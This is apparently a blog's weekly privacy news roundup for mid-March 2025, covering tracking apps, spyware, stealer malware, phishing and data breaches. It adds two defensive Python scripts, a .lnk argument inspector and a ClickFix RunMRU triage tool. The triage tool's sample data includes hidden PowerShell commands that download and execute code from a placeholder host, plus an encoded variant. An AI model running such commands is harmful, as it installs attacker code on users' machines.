
Privacy Roundup: Week 12 of Year 2025
This is a news item roundup of privacy or privacy-related news items for 16 MAR 2025 - 22 MAR 2025. Information and summaries provided here are as-is, without warranty.
Note: You may see some traditional "security" content mixed in here due to the close relationship between online privacy and cybersecurity - many things overlap; for example, major vulnerabilities in popular software, which may compromise the security of users' devices (and therefore pose a threat to their privacy), and large data breaches where significant personal information is exposed.
Items presented here are typically curated with the end user and small groups (such as families and small/micro businesses) in mind. Due to this focus, items primarily affecting enterprises or large organizations may not be included, even if they are widespread or "popular" stories.
Privacy Tip of the Week
You should at least enable MFA on important/sensitive accounts. While MFA is primarily a security feature, its privacy benefit is that it adds another layer of defense against unauthorized access to the information held in those important or sensitive accounts.
Surveillance Tech in the News
This section covers surveillance technology and methods in the news. Specifically, stories and news items where public and/or private organizations have leveraged their capabilities to encroach on user privacy; for example, data brokers using underhanded means to harvest user location data without user knowledge or public organizations using technology without regard for user privacy.
Android Apps Use Bluetooth and WiFi Scanning to Track Users Without GPS
Cyber Insider
Researchers found that 86% of the apps they analyzed collect sensitive data, including location data derived from scanning Wi-Fi network details, and collect device identifiers. These apps also frequently use Bluetooth data to infer location and proximity to nearby devices.
This data collection is primarily facilitated by software development kits (SDKs), which developers include in apps to add features without coding them from the ground up; the developers themselves may be unaware of the privacy implications for their app's users.
Judge stops Musk's team from 'unbridled access' to Social Security private data
Reuters
As DOGE continues to push for access to more systems containing sensitive information about Americans, a judge has ordered the Social Security Administration to stop sharing data with "DOGE affiliates". Allegedly (and in line with prior reporting), DOGE accessed sensitive SSA data without proper vetting, similar to when it gained access to US Treasury payment data, which also contains sensitive information on millions of Americans.
Researchers name several countries as potential Paragon spyware customers
TechCrunch
The Citizen Lab, a group of academics and security researchers, recently published a report indicating the governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are "likely" customers of Israeli spyware maker Paragon Solutions.
Privacy Tools and Services
Primarily covers tools and services with a focus on maintaining/improving/respecting user privacy. Generally includes recommended services/tools found on avoidthehack, but also may feature upcoming/other privacy services not necessarily recommended or promoted by avoidthehack.com
Privacy Tools
Bitwarden enables biometric unlock on Linux
Bitwarden
When installed via Snap (Snapcraft) on Linux, the Bitwarden desktop application can now use biometrics to unlock the vault.
Privacy Services
Cape opens $99/month beta of its privacy-first mobile plan, inks Proton deal, raises $30M
TechCrunch
I usually don't include beta software in this series (or really on avoidthehack) or early-stage startups because things in those early stages go through such turbulence... but given the Salt Typhoon breach and the apparent lackluster security practices and culture at just about every American telecommunications company, this was too interesting to ignore.
Cape is a mobile carrier startup claiming to provide a more secure and private alternative to traditional telecommunications services. It also appears to have partnered with Proton.
Vulnerabilities and Malware
Primarily includes severe and exploited vulnerabilities in devices or software used by end users (ex: a major router firmware flaw). Malware campaigns covered generally target/affect the end user.
This section will not contain every vulnerability/CVE or malware campaign reported, but will focus on those with the largest potential impact on a wide range of end users.
Vulnerabilities
Apple’s Passwords app was vulnerable to phishing attacks for nearly three months after launch
9to5Mac
Security researchers at Mysk first discovered this vulnerability after noticing that the Passwords app had connected to 130 different domains over plain (unencrypted) HTTP. Specifically, it fetched account icons over HTTP and defaulted to opening password reset pages over HTTP, which gave an attacker on the same network the opportunity to intercept those requests and redirect the user to a phishing page.
Apple patched this vulnerability in December 2024 but only disclosed it recently.
Cybercriminals Exploit CheckPoint Antivirus Driver in Malicious Campaign
Infosecurity Magazine
Threat actors are using a "bring your own vulnerable driver" (BYOVD) attack: they load a legitimately signed but vulnerable driver to gain kernel-level access and disable or bypass Windows security tooling. With those protections out of the way, the attackers had high-level access and could read information such as user passwords and other stored credentials.
Microsoft isn't fixing 8-year-old shortcut exploit abused for spying
The Register
Nation-state backed threat actors (including groups from North Korea, Iran, Russia, and China) have been abusing Windows shortcut (.LNK) files for many years. These threat actors go to lengths to bury the actual commands inside malicious .LNK files, which then download malware onto the machine.
According to Microsoft, despite this observed trend, it doesn't intend to release a security fix, although it could do so in the future.
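The item above says attackers bury the real command inside the shortcut; the obvious question for a defender is how to get it back out. The following is an added example, not code from The Register, Microsoft, or the researchers: it parses the Shell Link header and StringData fields of a .lnk file to recover the COMMAND_LINE_ARGUMENTS string, then flags one hiding technique, front-padding the arguments with whitespace or making them longer than the shortcut's Properties dialog will show. The thresholds, the launcher list, and the sample .lnk built in memory are this example's assumptions.

```python
import struct

# LinkFlags bits from the MS-SHLLINK (Shell Link binary format) specification.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# StringData fields follow the header (and the optional IDList/LinkInfo) in
# this fixed order; each is present only when its flag is set.
STRING_DATA = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Heuristic thresholds: this example's assumptions, not values from the article.
# The shortcut Properties dialog shows only a bounded prefix of the Target field,
# so arguments front-loaded with whitespace, or far longer than the dialog
# displays, keep the real command out of sight.
MAX_PADDING = 16
MAX_VISIBLE_LENGTH = 260
LAUNCHERS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
             "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")


def parse_lnk(data: bytes) -> dict:
    """Walk a .lnk file far enough to return its StringData fields."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link file (bad HeaderSize)")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) then the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    fields = {"flags": flags}
    for bit, key in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {key} string")
        pos += count * width
        fields[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", errors="replace")
    return fields


def assess_arguments(fields: dict) -> dict:
    """Flag COMMAND_LINE_ARGUMENTS that are padded or oversized to hide a command."""
    args = fields.get("arguments", "")
    padding = len(args) - len(args.lstrip())
    visible = args.strip()
    launchers = [name for name in LAUNCHERS if name in visible.lower()]
    reasons = []
    if padding > MAX_PADDING:
        reasons.append(f"{padding} leading whitespace characters before the command")
    if len(args) > MAX_VISIBLE_LENGTH:
        reasons.append(f"arguments are {len(args)} characters long")
    if launchers:
        reasons.append("invokes " + ", ".join(launchers))
    hidden = padding > MAX_PADDING or len(args) > MAX_VISIBLE_LENGTH
    return {"padding": padding, "command": visible, "launchers": launchers,
            "suspicious": hidden, "reasons": reasons}


def build_lnk(arguments: str, name: str = "") -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (constructed sample, not real malware)."""
    flags = HAS_ARGUMENTS | IS_UNICODE | (HAS_NAME if name else 0)
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    strings = ([name] if name else []) + [arguments]
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return bytes(header) + body


# Constructed sample: 300 characters of mixed whitespace (space, tab, LF, CR, VT)
# pushed ahead of a harmless placeholder command.
PADDED_ARGS = ("\x20\x09\x0a\x0d\x0b" * 60) + 'powershell -NoProfile -Command "Write-Output hidden"'
SAMPLE_LNK = build_lnk(PADDED_ARGS, name="Quarterly report.pdf")

if __name__ == "__main__":
    verdict = assess_arguments(parse_lnk(SAMPLE_LNK))
    print(verdict["suspicious"], verdict["reasons"])
```

Run the file as-is and it reports the constructed shortcut as suspicious; point parse_lnk at the bytes of a real .lnk to see what its Properties dialog is not showing you.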
Malware
AMOS and Lumma stealers actively spread to Reddit users
MalwareBytes
Reddit posts (made directly on reddit.com) by threat actors on subreddits frequented by cryptocurrency traders link to information-stealing malware.
New Arcane infostealer infects YouTube, Discord users via game cheats
Bleeping Computer
A campaign spreading information stealer Arcane primarily uses video game cheats as a lure; specifically, the campaign uses YouTube videos promoting game cheats and cracks to trick users into downloading a password-protected archive containing a malware loader script. Once executed, the script fetches the information stealing malware.
The Kaspersky researchers noted that this "Arcane" information stealer has no known links to, or overlapping code with, Arcane Stealer V. Arcane steals a wide range of user data, including VPN account credentials, gaming client information, messaging app data, and information stored in various web browsers.
300 Malicious ‘Vapor’ Apps Hosted on Google Play Had 60 Million Downloads
SecurityWeek
The Vapor campaign was initially reported as over 180 malicious apps on Google Play (later expanded to more than 300) posing as utility, health and fitness, and lifestyle apps, designed to deploy "endless, intrusive full-screen interstitial video ads." Apps in the Vapor campaign bypassed protections introduced in recent versions of Android. These apps also attempted to harvest user account credentials and credit card information.
Warning over free online file converters that actually install malware
MalwareBytes
Malicious websites offering free online file conversion (usually .docx to .pdf) may drop malware onto a device. The file conversion usually works, but the converted file the user downloads may contain malware designed to lift sensitive information such as credentials, passwords, and session tokens.
Sniper: Phantom's Resolution Is Seemingly Another Game That Installs Malware On Your PC
TheGamer
Valve removed the video game "Sniper: Phantom's Resolution" from Steam after user reports that the game's free demo loaded malware onto their machines. A Reddit user found that the malware obtains administrator privileges and exfiltrates data stolen from the machine, which is common behavior for information stealers.
StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
Microsoft Security
According to Microsoft, this remote access trojan (RAT) isn't widely distributed, but in their analysis of this malware they state it demonstrates "sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data."
Microsoft identified key capabilities of StilachiRAT, which include: collecting detailed system information, such as hardware identifiers and active RDP sessions; scanning for configuration data of 20 different Chrome cryptocurrency wallet extensions; extracting and decrypting credentials saved in Google Chrome; continuously monitoring clipboard data; and executing commands issued by the C2 server.
Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
Infosecurity Magazine
According to the latest HP Threat Insights Report, threat actors are increasingly using fake CAPTCHA pages (ClickFix tactics) to trick users into running PowerShell commands that install Lumma Stealer on their machines. In the same report, HP also identified campaigns spreading XenoRAT by using social engineering to convince users to enable macros in Word and Excel documents.
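The fake-CAPTCHA flow above ends with the victim pasting a command into the Windows Run box (or a PowerShell prompt), and the Run box records what was pasted in the RunMRU registry key. As an added example, not from the HP report or the article, the Python below triages such entries from a constructed RunMRU dictionary: it decodes any -EncodedCommand payload, scores each command against a small indicator list, and marks the ones worth a look. The indicator patterns, their weights, the "I am not a robot" comment marker, and the sample entries are this example's assumptions.

```python
import base64
import re
from typing import Optional

# Win+R history lives under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# one REG_SZ value per entry ("<command>\1") plus an MRUList value giving their order.
# Everything below (patterns, weights, lure marker) is this example's assumption.
INDICATORS = (
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2, "hidden window"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I), 3, "download cradle"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "executes fetched text"),
    (re.compile(r"\bmshta\b.*https?://", re.I), 3, "mshta with remote URL"),
    (re.compile(r"i am not a robot|recaptcha|verification id|verify you are human", re.I), 4, "CAPTCHA lure comment"),
)
# -e, -ec, -en, -enc and -EncodedCommand all select the same PowerShell switch.
ENCODED = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_SCORE = 5


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), if present."""
    match = ENCODED.search(command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(command: str) -> dict:
    """Score one Run-box command; a decoded payload is scanned alongside the original."""
    decoded = decode_encoded_command(command)
    text = command if decoded is None else command + "\n" + decoded
    hits = [label for pattern, _, label in INDICATORS if pattern.search(text)]
    score = sum(weight for pattern, weight, _ in INDICATORS if pattern.search(text))
    if decoded is not None:
        hits.append("encoded command")
        score += 2
    return {"command": command, "decoded": decoded, "score": score,
            "hits": hits, "suspicious": score >= SUSPICIOUS_SCORE}


def runmru_entries(values: dict) -> list:
    """Return Run-box history most recent first, with the trailing '\\1' removed."""
    entries = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        entries.append(raw[:-2] if raw.endswith("\\1") else raw)
    return entries


def triage(values: dict) -> list:
    """Score every RunMRU entry in most-recent-first order."""
    return [score_command(command) for command in runmru_entries(values)]


def encode_command(plain: str) -> str:
    """Encode a command the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(plain.encode("utf-16-le")).decode("ascii")


# Constructed RunMRU values, not telemetry from any real host. "c" is the most recent.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr https://lure.invalid/v | iex" '
         "# I am not a robot - reCAPTCHA Verification ID: 2931\\1",
    "c": "powershell -nop -w hidden -enc " + encode_command("iex (irm https://lure.invalid/p)") + "\\1",
}

if __name__ == "__main__":
    for result in triage(SAMPLE_RUNMRU):
        print(result["suspicious"], result["score"], result["hits"])
```

On a real machine, export the RunMRU key (for example with reg.exe) and feed its values into triage; the encoded-command decoding is what makes the scoring useful, since a ClickFix paste rarely shows its download cradle in the clear.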
Phishing and Scams
Covers popular phishing schemes affecting end users - smishing, vishing, and any new scam/phish tactics for deceiving end users. May overlap some with malware, but focuses more on the phishing tactics than details on a malware delivery/campaign information.
Phishing
Semrush impersonation scam hits Google Ads
MalwareBytes
A phishing campaign leveraging Google Search Ads is impersonating popular SEO tool/SaaS Semrush. To run these malicious Google Search Ads, the threat actors successfully take over Google advertiser accounts and subsequently take out ads impersonating the Semrush brand. The malicious ads point to phishing pages designed to harvest Google account credentials.
Scareware Combined With Phishing in Attacks Targeting macOS Users
SecurityWeek
According to researchers at LayerX, threat actors who originally targeted Windows users with scareware tactics have now also started targeting macOS users. Users who mistyped URLs for legitimate websites landed on compromised domain "parking" pages and were then redirected to phishing pages.
752,000 Browser Phishing Attacks Mark 140% Increase YoY
Infosecurity Magazine
This is not a description of any specific phishing campaign. According to a report by Menlo Security, between 2023 and 2024 there was a 140% year-over-year increase in browser-based phishing attacks. According to this data, threat actors (they specifically call out cybercriminals) are focusing on browsers as their primary attack vector.
The report also outlines notable trends related to browser-based phishing attacks -- for example, the abuse of Cloudflare services for phishing, which increased by 104% in 2024.
Service Providers' Privacy Practices
This section is dedicated to notable changes or developments in popular/large service provider's privacy practices.
Service providers listed here are not necessarily "privacy-focused," but may have privacy practice changes positively (ex: adopting end-to-end encryption for messaging) or negatively (ex: increased sharing of data with affiliates) affecting a large number of users.
Gmail's upgraded search results help you find the emails you want, faster.
Google blog
Google introduces AI to searching for emails on its mail app, apparently leveraging elements like "recency, most-clicked emails and frequent contacts." There doesn't appear to be a specific privacy policy change associated with this particular change.
Legislation/Regulations/Lawsuits
Predominately focused on legal/regulation privacy practices outlined in US law (ex: FTC banning certain companies from sharing location data), but large enough changes in EU law may also be covered here.
Legislation and Regulation
A Win for Encryption: France Rejects Backdoor Mandate
EFF
While not US-based, this is worth including and following considering the US's close ties with countries in the EU.
French legislators were considering a dangerous proposal that would enable backdoors in end-to-end encrypted platforms. Such a measure would particularly threaten the integrity of end-to-end encrypted messengers, ultimately negatively impacting any security and privacy gained from using such messengers.
Data Breaches and Leaks
Generally covers large data breaches (or data leaks) exposing sensitive information of users - typically the focus is on US companies and on data breaches affecting primarily US citizens, though some exceptions are made depending on potential impact and scale.
Will not cover every data breach, naturally, due to frequency and scale.
Data breaches
US teachers’ union says hackers stole sensitive personal data on over 500,000 members
TechCrunch
According to a filing with Maine's attorney general on 18 MAR 2025, the Pennsylvania State Education Association (PSEA) suffered a cyber attack sometime in JUL 2024. In this attack, the threat actor gained unauthorized access to data belonging to over 517,000 individuals.
The stolen data includes:
- members' government issued IDs
- social security numbers
- passport numbers
- medical information
- card numbers -- including PINs and expiration dates
Compromised data varies between individuals.
Sperm donation giant California Cryobank warns of a data breach
Bleeping Computer
California Cryobank, the largest sperm bank in the US, suffered a data breach exposing customers' personal information. The breach originally occurred in APR 2024. The information compromised varies by customer, but could include:
- Names
- Bank account/routing numbers
- Social Security numbers
- driver's license numbers
- credit card information
- health insurance information
As of writing it is unclear whether donor information was compromised.
Oracle denies breach after hacker claims theft of 6 million data records
Bleeping Computer
This data breach is unconfirmed as of writing. A threat actor known as rose87168 claimed to be selling ~6 million data records stolen from Oracle Cloud federated SSO servers. As "proof" of the breach, the threat actor released text files containing a sample database and LDAP information of associated companies. The threat actor also shared an Internet Archive URL showing a .txt file containing their ProtonMail email address that they had uploaded to an Oracle server.
Data leaks
DOGE staffer violated Treasury rules by emailing unencrypted personal data
TechCrunch
A staffer working for DOGE broke Treasury policies surrounding the handling of personal information; according to a federal lawsuit, the staffer sent an email containing unencrypted personal information. As of writing, there are no details on what data was improperly shared.
DOGE to Fired CISA Staff: Email Us Your Personal Data
KrebsOnSecurity
Included for the data leak potential from data mishandling or interception. A number of federal employees at the Cybersecurity and Infrastructure Security Agency (CISA) have been laid off in recent months by the current administration. However, a recent court order legally required agencies to rehire the laid-off probationary employees.
However, deviating from conventional security principles, a message posted to the CISA website instructs recently fired CISA employees to send their personal information (including social security numbers and dates of birth) in a password-protected email attachment in order to be rehired... with the password included in the body of the same email.
‘Dogequest’ Site Claims to Dox Tesla Owners Across the U.S.
404media
The website DOGEQUEST hosts a searchable map with the alleged names, addresses, phone numbers, and email addresses of Tesla owners across the US. The map also includes addresses of Tesla dealerships and Superchargers, as well as personal information of DOGE staff.
Personal data revealed in released JFK files
MalwareBytes
The current administration ordered the release of over 60,000 pages related to the 1963 assassination of President John F. Kennedy on 17 MAR 2025. The release doesn't answer many lingering questions or settle numerous conspiracy theories, but it did leak approximately 400 social security numbers and other personally identifiable information of former congressional staffers.